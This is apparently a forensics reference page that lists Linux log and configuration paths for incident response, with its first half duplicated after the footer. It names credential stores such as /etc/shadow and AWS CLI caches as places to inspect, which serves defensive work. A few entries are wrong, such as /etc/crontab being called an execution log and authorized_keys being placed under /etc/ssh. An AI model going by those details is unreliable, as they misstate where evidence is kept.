Linux Forensics Logs

Investigating Linux logs can help you to find the threat and incident response as well therefore Here are the main logs for Linux

1. System Logs

    /var/log/syslog (Debian-based systems): Logs system messages and information about startup services.
    /var/log/messages (Red Hat-based systems): General-purpose system log containing kernel and application messages.
    /var/log/dmesg: Kernel ring buffer messages, useful for identifying hardware and driver issues.

2. Authentication and Access Logs

/var/log/auth.log (Debian-based systems): Logs all authentication activities such as logins, SSH, sudo, and PAM events.
/var/log/secure (Red Hat-based systems): Equivalent to auth.log, logs authentication and security events.
/var/log/faillog: Records failed login attempts.
/var/log/lastlog: Tracks the last login of each user.
/var/log/wtmp and /var/log/btmp: Binary files tracking login sessions (wtmp) and failed logins (btmp). Use last and lastb commands to read them

3. Process and Task Monitoring

/var/log/cron: Logs cron job execution.
/var/log/atop: Advanced system and process resource monitoring logs.
/proc/: Dynamic runtime system information, including process details (e.g., /proc/<PID>).

4. Network Logs

/var/log/ufw.log: Logs generated by the Uncomplicated Firewall (UFW).
/var/log/firewalld: Logs generated by firewalld.
/var/log/iptables.log (if configured): Tracks firewall rule activities.
/var/log/suricata.log or /var/log/snort.log: Logs generated by IDS/IPS tools (if installed).
/var/log/audit/audit.log: Contains SELinux denials and audit-related network activities.
/var/log/maillog or /var/log/mail.log: Email server logs for detecting phishing or malware campaigns.
/etc/hosts :Maps hostnames to IP addresses
/etc/resolv.conf : Configures DNS servers 
/etc/network/     : Networking configuration files
/etc/ufw/            : Contains firewall configurations
/etc/hosts.allow  : Controls access to network services via TCP Wrappers
/etc/hosts.deny

5. Application and Service Logs

/var/log/apache2/: Logs for Apache web server (e.g., access and error logs).
/var/log/apache2/access.log  : Analyzes requests
/var/log/nginx/: Logs for NGINX web server.
/var/log/mysql/: Logs for MySQL/MariaDB database activities.
/var/log/postgresql/: Logs for PostgreSQL database activities.
/var/log/docker.log: Logs related to Docker container activities.
/var/lib/docker/containers/: Individual container logs.

6. User Activity Monitoring

~/.bash_history: Tracks user command history (can be tampered with).
~/.zsh_history: Similar to bash_history for Zsh shell.
/var/log/sudo.log: Logs all sudo command usage.
/var/log/user.log: Contains user-specific actions and process

7. File Integrity and Change Monitoring

    /var/log/audit/audit.log: Tracks system changes and file access (useful for forensic analysis with auditd).
    /var/log/tripwire/report/: Logs from Tripwire file integrity monitoring (if installed).
    /var/log/inotify/ (if configured): Logs file system change events monitored using inotify

8. System and Package Updates

/var/log/apt/: Logs for package management activities (Debian-based systems).
/var/log/yum.log or /var/log/dnf.log: Logs for package management (Red Hat-based systems).
/var/log/samba  : Logs file-sharing activities for Samba servers - Track unauthorized access to shared resources
/var/log/nfslog  :  Tracks access to Network File System shares.

9. Boot and Initialization Logs

/var/log/boot.log: Logs generated during system boot.
/var/log/kern.log: Kernel-specific events during system operation and boot.

10. Miscellaneous Logs

/var/log/xorg.0.log: X server (GUI) logs.
/var/log/cloud-init.log: Logs for cloud instance initialization.
/var/log/rkhunter.log: Logs from Rootkit Hunter scans (if installed).

11. Cron Jobs and Task Scheduling

/etc/crontab : logs the execution of scheduled tasks via cron and Identify unauthorized or suspicious cron jobs. /var/spool/cron/crontabs/
/etc/systemd/system/persistence.service/

12. Mail and Communication

/var/log/mail.log :Monitors outgoing and incoming email messages and Look for spam activity or data exfiltration /var/log/maillog

13. Cloud and Remote Management Logs

/etc/ssh/sshd_config
/etc/ssh/authorized_keys
~/.aws/cli/cache

14. User credentials

/usr/bin/passwd
/etc/passwd : Lists all system users. 
/etc/shadow : Stores hashed passwords for users
/etc/group    : Defines group memberships

15. Security Policies and Controls

/etc/sudoers : Defines sudo permissions - Check for unauthorized privilege escalation

16. Investigate Time Adjustments

grep ntp /var/log/syslog : NTP logs can reveal synchronization history or potential anomalies 
grep "time correction" /var/log/syslog

17. Database Logs - tracks database activities, errors, and slow querie

/var/log/mysql/error.log 
/var/log/postgresql/postgresql--main.log

PreviousLinux Memory Forensics NextLinux Forensics dirs

Last updated 5 months ago

/var/log/syslog (Debian-based systems): Logs system messages and information about startup services. /var/log/messages (Red Hat-based systems): General-purpose system log containing kernel and application messages. /var/log/dmesg: Kernel ring buffer messages, useful for identifying hardware and driver issues.

/var/log/auth.log (Debian-based systems): Logs all authentication activities such as logins, SSH, sudo, and PAM events. /var/log/secure (Red Hat-based systems): Equivalent to auth.log, logs authentication and security events. /var/log/faillog: Records failed login attempts. /var/log/lastlog: Tracks the last login of each user. /var/log/wtmp and /var/log/btmp: Binary files tracking login sessions (wtmp) and failed logins (btmp). Use last and lastb commands to read them

/var/log/ufw.log: Logs generated by the Uncomplicated Firewall (UFW). /var/log/firewalld: Logs generated by firewalld. /var/log/iptables.log (if configured): Tracks firewall rule activities. /var/log/suricata.log or /var/log/snort.log: Logs generated by IDS/IPS tools (if installed). /var/log/audit/audit.log: Contains SELinux denials and audit-related network activities. /var/log/maillog or /var/log/mail.log: Email server logs for detecting phishing or malware campaigns. /etc/hosts :Maps hostnames to IP addresses /etc/resolv.conf : Configures DNS servers /etc/network/ : Networking configuration files /etc/ufw/ : Contains firewall configurations /etc/hosts.allow : Controls access to network services via TCP Wrappers /etc/hosts.deny

/var/log/apache2/: Logs for Apache web server (e.g., access and error logs). /var/log/apache2/access.log : Analyzes requests /var/log/nginx/: Logs for NGINX web server. /var/log/mysql/: Logs for MySQL/MariaDB database activities. /var/log/postgresql/: Logs for PostgreSQL database activities. /var/log/docker.log: Logs related to Docker container activities. /var/lib/docker/containers/: Individual container logs.

~/.bash_history: Tracks user command history (can be tampered with). ~/.zsh_history: Similar to bash_history for Zsh shell. /var/log/sudo.log: Logs all sudo command usage. /var/log/user.log: Contains user-specific actions and process

/var/log/audit/audit.log: Tracks system changes and file access (useful for forensic analysis with auditd). /var/log/tripwire/report/: Logs from Tripwire file integrity monitoring (if installed). /var/log/inotify/ (if configured): Logs file system change events monitored using inotify

/var/log/apt/: Logs for package management activities (Debian-based systems). /var/log/yum.log or /var/log/dnf.log: Logs for package management (Red Hat-based systems). /var/log/samba : Logs file-sharing activities for Samba servers - Track unauthorized access to shared resources /var/log/nfslog : Tracks access to Network File System shares.